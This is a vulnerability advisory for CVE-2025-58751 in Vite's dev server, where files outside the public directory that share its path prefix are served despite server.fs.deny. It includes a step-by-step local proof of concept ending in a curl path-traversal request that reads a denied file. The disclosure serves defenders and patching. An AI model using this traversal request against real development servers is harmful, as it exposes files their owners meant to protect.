
Vite arbitrary restricted remote file leak

CVE-2025-58751 | CVSS 7.5

JFrog Severity: high

Discovered by Ori Hollander of the JFrog Security Research Team

Published 15 Sep, 2025 | Last updated 15 Sep, 2025


Affected package: vite

Affected versions:

>=7.1.0,<=7.1.4
>=7.0.0,<=7.0.6
>=6.0.0,<=6.3.5
<=5.4.19

This vulnerability allows a remote attacker to read files that live outside of the public directory, provided the absolute path of the target file begins with the absolute path of the public directory as a plain string prefix (the check does not require a path-separator boundary). Because such a file is treated as a public asset, it is served even when it is explicitly listed in server.fs.deny.

For example:

Public directory: /www/p

File to leak: /www/private.txt (starts with the string "/www/p", but is not inside that directory)

Execute the following shell commands (note that publicDir is p, so its absolute path is a prefix of the absolute path of private.txt):

# Accept the default project name, vite-project, at the prompt
npm create vite@latest
cd vite-project/
# The public directory; private.txt will be created as its sibling
mkdir p
cd p
# Dangling symlink inside the public directory, as used by the original proof of concept
ln -s a b
cd ..
# publicDir points at p/, and private.txt is explicitly placed in server.fs.deny
echo 'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.js
# The file to leak: outside publicDir, but sharing its path prefix
echo "secret" > private.txt
npm install
npm run dev

Then, in a different shell, request the file. The --path-as-is flag stops curl from collapsing the ../ segment before the request is sent, so the dev server receives it verbatim and responds with the contents of private.txt:

curl -v --path-as-is 'http://localhost:5173/../private.txt'

No mitigations are supplied for this vulnerability; upgrade to a release above the affected version ranges.

Fix PR
